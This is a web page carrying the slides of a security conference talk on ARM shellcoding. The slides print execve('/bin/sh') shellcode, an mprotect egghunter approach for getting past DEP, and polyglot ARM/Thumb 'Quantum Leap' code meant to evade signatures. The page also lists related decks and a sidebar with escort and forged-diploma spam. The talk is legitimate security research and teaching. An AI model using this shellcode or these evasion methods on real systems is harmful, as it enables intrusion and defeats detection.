Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceSaumil Shah
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadSaumil Shah
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadSaumil Shah
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019Saumil Shah
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-XSaumil Shah
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDSaumil Shah
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019Saumil Shah
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019Saumil Shah
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling PhotographSaumil Shah
 
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation WorkshopHack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation WorkshopSaumil Shah
 
ARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopSaumil Shah
 
Cross Border Cyber Attacks: Impact on Digital Sovereignty
Cross Border Cyber Attacks: Impact on Digital SovereigntyCross Border Cyber Attacks: Impact on Digital Sovereignty
Cross Border Cyber Attacks: Impact on Digital SovereigntySaumil Shah
 

Mehr von Saumil Shah (20)

The Hand That Strikes, Also Blocks
The Hand That Strikes, Also BlocksThe Hand That Strikes, Also Blocks
The Hand That Strikes, Also Blocks
 
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPSDebugging with EMUX - RIngzer0 BACK2WORKSHOPS
Debugging with EMUX - RIngzer0 BACK2WORKSHOPS
 
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation FrameworkUnveiling EMUX - ARM and MIPS IoT Emulation Framework
Unveiling EMUX - ARM and MIPS IoT Emulation Framework
 
Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332Announcing ARMX Docker - DC11332
Announcing ARMX Docker - DC11332
 
Precise Presentations
Precise PresentationsPrecise Presentations
Precise Presentations
 
Effective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual AudienceEffective Webinars: Presentation Skills for a Virtual Audience
Effective Webinars: Presentation Skills for a Virtual Audience
 
INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020INSIDE ARM-X Cansecwest 2020
INSIDE ARM-X Cansecwest 2020
 
Cyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade AheadCyberspace And Security - India's Decade Ahead
Cyberspace And Security - India's Decade Ahead
 
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In CyberspaceCybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
Cybersecurity And Sovereignty - A Look At Society's Transformation In Cyberspace
 
NSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade AheadNSConclave2020 The Decade Behind And The Decade Ahead
NSConclave2020 The Decade Behind And The Decade Ahead
 
Cybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade AheadCybersecurity In India - The Decade Ahead
Cybersecurity In India - The Decade Ahead
 
INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019INSIDE ARM-X - Countermeasure 2019
INSIDE ARM-X - Countermeasure 2019
 
Introducing ARM-X
Introducing ARM-XIntroducing ARM-X
Introducing ARM-X
 
The Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBDThe Road To Defendable Systems - Emirates NBD
The Road To Defendable Systems - Emirates NBD
 
The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019The CISO's Dilemma 44CON 2019
The CISO's Dilemma 44CON 2019
 
The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019The CISO's Dilemma HITBGSEC2019
The CISO's Dilemma HITBGSEC2019
 
What Makes a Compelling Photograph
What Makes a Compelling PhotographWhat Makes a Compelling Photograph
What Makes a Compelling Photograph
 
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation WorkshopHack.LU 2018 ARM IoT Firmware Emulation Workshop
Hack.LU 2018 ARM IoT Firmware Emulation Workshop
 
ARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation Workshop
 
Cross Border Cyber Attacks: Impact on Digital Sovereignty
Cross Border Cyber Attacks: Impact on Digital SovereigntyCross Border Cyber Attacks: Impact on Digital Sovereignty
Cross Border Cyber Attacks: Impact on Digital Sovereignty
 

Kürzlich hochgeladen

Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Andreas Granig
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based projectAnoyGreter
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsAhmed Mohamed
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Velvetech LLC
 
Introduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfIntroduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfFerryKemperman
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....kzayra69
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...confluent
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Angel Borroy López
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)jennyeacort
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtimeandrehoraa
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Natan Silnitsky
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxTier1 app
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样umasea
 
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in NoidaBuds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in Noidabntitsolutionsrishis
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanyChristoph Pohl
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaHanief Utama
 

Kürzlich hochgeladen (20)

Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024
 
Advantages of Odoo ERP 17 for Your Business
Advantages of Odoo ERP 17 for Your BusinessAdvantages of Odoo ERP 17 for Your Business
Advantages of Odoo ERP 17 for Your Business
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based project
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML Diagrams
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...
 
Introduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfIntroduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdf
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
 
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
Call Us🔝>༒+91-9711147426⇛Call In girls karol bagh (Delhi)
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtime
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
 
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptxKnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
KnowAPIs-UnknownPerf-jaxMainz-2024 (1).pptx
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
 
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in NoidaBuds n Tech IT Solutions: Top-Notch Web Services in Noida
Buds n Tech IT Solutions: Top-Notch Web Services in Noida
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief Utama
 
2.pdf Ejercicios de programación competitiva
2.pdf Ejercicios de programación competitiva2.pdf Ejercicios de programación competitiva
2.pdf Ejercicios de programación competitiva
 

Make ARM Shellcode Great Again - HITB2018PEK

  • 1. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Make ARM Shellcode Great Again #HITB2018PEK
  • 2. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK # who am i CEO Net-square. • Hacker, Speaker, Trainer, Author. • M.S. Computer Science Purdue University. • LinkedIn: saumilshah • Twitter: @therealsaumil
  • 3. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Agenda • A background on ARM shellcode • My research around ARM shellcode – space limitations - ARM mprotect Egghunter – polyglot tricks - ARM Quantum Leap shellcode • Demos
  • 4. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Example: ARM execve() Shellcode .section .text .global _start _start: .code 32 add r1, pc, #1 bx r1 .code 16 adr r0, SHELL eor r1, r1, r1 eor r2, r2, r2 strb r2, [r0, #7] mov r7, #11 svc #1 .balign 4 SHELL: .ascii "/bin/shX" Switch to Thumb mode: branch pc + 1 ARM CODE 00: e28f1001 add r1, pc, #1 04: e12fff11 bx r1 THUMB CODE 08: a002 add r0, pc, #8 0a: 4049 eors r1, r1 0c: 4052 eors r2, r2 0e: 71c2 strb r2, [r0, #7] 10: 270b movs r7, #11 12: df01 svc 1 LITERAL POOL 14: 6e69622f .word 0x6e69622f 18: 5868732f .word 0x5868732f
  • 5. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK 31 30 29 28 27 26 25 24 23 22 21 20 19 18 17 16 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 1 1 1 0 0 0 1 1 1 0 1 0 0 0 0 0 0 0 0 1 0 0 0 0 0 0 0 0 0 1 1 1 condition mov operand1 r1 #7 ARM and THUMB Encoding 15 14 13 12 11 10 9 8 7 6 5 4 3 2 1 0 0 0 1 0 0 0 0 1 0 0 0 0 0 1 1 1 mov r1 #7 mov r1, #7 32 bit ARM instruction 16 bit Thumb instruction
  • 6. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK heap stack Lib Lib Binary overflow pointer ROP shellcode shellcode shellcode Shellcode in tight spaces • What if payload exceeds size "constraints"? – Overwrite local variables. – Bottom of the stack. • Many solutions. SEGFAULT! SEGFAULT!
  • 7. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Egghunter • Searches for an EGG (4+4 byte value) in the process memory. • Uses syscalls to determine whether a memory page exists or not (safely). • Upon finding it, Egghunter transfers the control to the code following the EGG. • Nothing new here - done before.
  • 8. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Egghunter heap stack Lib Lib Binary shellcodeHACKHACK overflow ROP egghunter RWX - by ROP chain Search for HACK+HACK one page at a time. gef> vmmap Start End Perm Path 0x00008000 0x00009000 rw- /home/pi/eggbreak 0x00010000 0x00011000 rw- /home/pi/eggbreak 0x00011000 0x00032000 rw- [heap] 0xb6e9c000 0xb6fbe000 r-x /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fbe000 0xb6fc5000 --- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc5000 0xb6fc7000 r-- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc7000 0xb6fc8000 rw- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc8000 0xb6fcb000 rw- 0xb6fd8000 0xb6ff5000 r-x /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffa000 0xb6ffd000 rw- 0xb6ffd000 0xb6ffe000 r-- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffe000 0xb6fff000 rw- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6fff000 0xb7000000 r-x [sigpage] 0xbefdf000 0xbeffe000 rw- 0xbeffe000 0xbf000000 rwx [stack] memory page not executable shellcode shellcode
  • 9. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Egghunter - DEP • If EGG+shellcode is in a different memory region, then it may not be executable – Overflow in the stack – Shellcode in the heap • Enter the mprotect egghunter!
  • 10. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK mprotect Egghunter heap stack Lib Lib Binary shellcodeHACKHACK overflow ROP mprotect egghunter RWX RWX RWX RWX RWX RWX RWX gef> vmmap Start End Perm Path 0x00008000 0x00009000 rwx /home/pi/eggbreak 0x00010000 0x00011000 rwx /home/pi/eggbreak 0x00011000 0x00012000 rwx [heap] 0x00012000 0x00032000 rw- [heap] 0xb6e9c000 0xb6fbe000 r-x /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fbe000 0xb6fc5000 --- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc5000 0xb6fc7000 r-- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc7000 0xb6fc8000 rw- /lib/arm-linux-gnueabihf/libc-2.13.so 0xb6fc8000 0xb6fcb000 rw- 0xb6fd8000 0xb6ff5000 r-x /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffa000 0xb6ffd000 rw- 0xb6ffd000 0xb6ffe000 r-- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6ffe000 0xb6fff000 rw- /lib/arm-linux-gnueabihf/ld-2.13.so 0xb6fff000 0xb7000000 r-x [sigpage] 0xbefdf000 0xbeffe000 rw- 0xbeffe000 0xbf000000 rwx [stack] shellcode shellcode
  • 11. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK mprotect Egghunter DEMO
  • 12. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Example: ARM execve() Shellcode .section .text .global _start _start: .code 32 add r1, pc, #1 bx r1 .code 16 adr r0, SHELL eor r1, r1, r1 eor r2, r2, r2 strb r2, [r0, #7] mov r7, #11 svc #1 .balign 4 SHELL: .ascii "/bin/shX" Switch to Thumb mode: branch pc + 1 • Mostly begins with an ARM-to-Thumb mode switch. • Rest of the shellcode implemented in Thumb mode. • Compact, avoids bad characters, etc.
  • 13. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Some Concerns / Arguments • The "I can signature this" debate. – YARA Rules, IDS, Bro, blah blah… • What if our target runs on a Thumb-only processor? – for example: Cortex-M One Shellcode To Run Them All !
  • 14. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK "Quantum Leap" Shellcode Start in THUMB modeStart in ARM mode THUMB shellcode (execve, reverse, …) THUMB shellcode (execve, reverse, …) "LEAP" TO THUMB PASS THROUGH PASS THROUGH PASS THROUGH QUANTUM LEAP Same Same But Different
  • 15. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK "Quantum Leap" - what we need • An understanding of ARM and Thumb instruction encoding: – ARM instruction: "DO SOMETHING" – 2 THUMB instructions: "PASS THROUGH" • Conditional Execution in ARM instructions – very helpful! • A little bit of luck and perseverance. • Nomenclature Credit: "dialup" @44CON.
  • 16. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK The ARM to Thumb switch • Avoid "destructive" instructions – Branches, Load/Store, Floating Point, etc. • Should work on ARMv6 (no Thumb2) • Avoid Illegal instructions. 0: e28f1001 add r1, pc, #1 4: e12fff11 bx r1 8: 270b movs r7, #11 a: beff bkpt 0x00ff 0: 1001 asrs r1, r0, #32 2: e28f b.n 524 4: ff11 e12f vrhadd.u16 d14,d1,d31 8: 270b movs r7, #11 a: beff bkpt 0x00ff ORIGINAL ARM CODE "THUMB VIEW"
  • 17. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK ARM and THUMB decoding - 1 e28f1001 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 4 BYTE ARM INSTRUCTION - add r1, pc, #1 conditional opcodestatus operand 1 destination operand 2 Thumb instruction 2 Thumb instruction 1 • Controlled by ARM Opcode and conditional flags. • Part influenced by Operand 1 (ARM). • Trickier to control. • Controlled by Destination and Operand 2 of the ARM instruction. • Easier to control. im m ediate
  • 18. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK ARM and THUMB decoding - 1 e28f1001 1110 0010 1000 1111 0001 0000 0000 0001 add r1,pc,#1 1001 0001 0000 0000 0001 asrs r1,r0,#32 e28f 1110 0010 1000 1111 b 524 1 ARM INSTRUCTION RESULTING INTO 2 THUMB INSTRUCTIONS: conditional opcodestatus destination operand 2 im m ediate Branch instructions are destructive Thumb Opcode 2 influenced by ARM conditional bits operand 1 Thumb Opcode 1 influenced by ARM destination operand
  • 19. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK (Un)conditional Instructions • How can we turn an ARM instruction into a conditional instruction… • …with guaranteed execution everytime? • COMPLIMENTARY CONDITIONS. • One of the instructions is guaranteed to execute, irrespective of condition flags. e28f1001 add r1, pc, #1 128f1005 addne r1, pc, #5 028f1001 addeq r1, pc, #1 UNCONDITIONAL INSTRUCTION COMPLIMENTARY CONDITIONS
  • 20. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK ARM and THUMB decoding - 2 128f1005: 0001 0010 1000 1111 0001 0000 0000 0101 addne r1,pc,#5 1005: 0001 0000 0000 0101 asrs r5,r0,#32 128f: 0001 0010 1000 1111 asrs r7,r1,#10 028f1001: 0000 0010 1000 1111 0001 0000 0000 0001 addeq r1,pc,#1 1001: 0001 0000 0000 0001 asrs r1,r0,#32 028f: 0000 0010 1000 1111 lsls r7,r1,#10 USING CONDITIONAL ARM INSTRUCTIONS: conditional opcodestatus destination operand 2 im m ediate No destructive instructions in Thumb mode Complimentary Conditional ARM instructions operand 1
  • 21. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Final "Quantum Leap" Code 0: 228fa019 addcs sl, pc, #25 4: 328fa015 addcc sl, pc, #21 8: 21a0400d movcs r4, sp c: 31a0400d movcc r4, sp 10: 292d0412 pushcs {r1, r4, sl} 14: 392d0412 pushcc {r1, r4, sl} 18: 28bda002 popcs {r1, sp, pc} 1c: 38bda002 popcc {r1, sp, pc} 20: beff bkpt 0x00ff 22: beff bkpt 0x00ff 0: a019 add r0, pc, #100 2: 228f movs r2, #143 4: a015 add r0, pc, #84 6: 328f adds r2, #143 8: 400d ands r5, r1 a: 21a0 movs r1, #160 c: 400d ands r5, r1 e: 31a0 adds r1, #160 10: 0412 lsls r2, r2, #16 12: 292d cmp r1, #45 14: 0412 lsls r2, r2, #16 16: 392d subs r1, #45 18: a002 add r0, pc, #8 1a: 28bd cmp r0, #189 1c: a002 add r0, pc, #8 1e: 38bd subs r0, #189 20: beff bkpt 0x00ff 20: beff bkpt 0x00ff QUANTUM LEAP: ARM TO THUMB QUANTUM LEAP: PASS THROUGH (THUMB)
  • 22. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Assembling the Quantum Leap • No Thumb2 instructions. • No NULL bytes. • Took many iterations to finalise! • bx sl implemented by push {sl}, pop {pc}. • Register list proved to be a challenge. • Registers r4, sl altered in ARM. • Registers r0, r1, r2, r5 altered in Thumb.
  • 23. NETSQUARE (c) SAUMIL SHAH#HITB2018PEKDEMO QUANTUM LEAP SHELLCODE
  • 24. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK Conclusion • ARM/Thumb Polyglot instructions and conditional execution offer many opportunities for obfuscation and signature bypass. • Lots of exploration opportunities in ARM shellcoding. https://github.com/therealsaumil/arm_shellcode
  • 25. NETSQUARE (c) SAUMIL SHAH#HITB2018PEK exit(0) Saumil Shah @therealsaumil#HITB2018PEK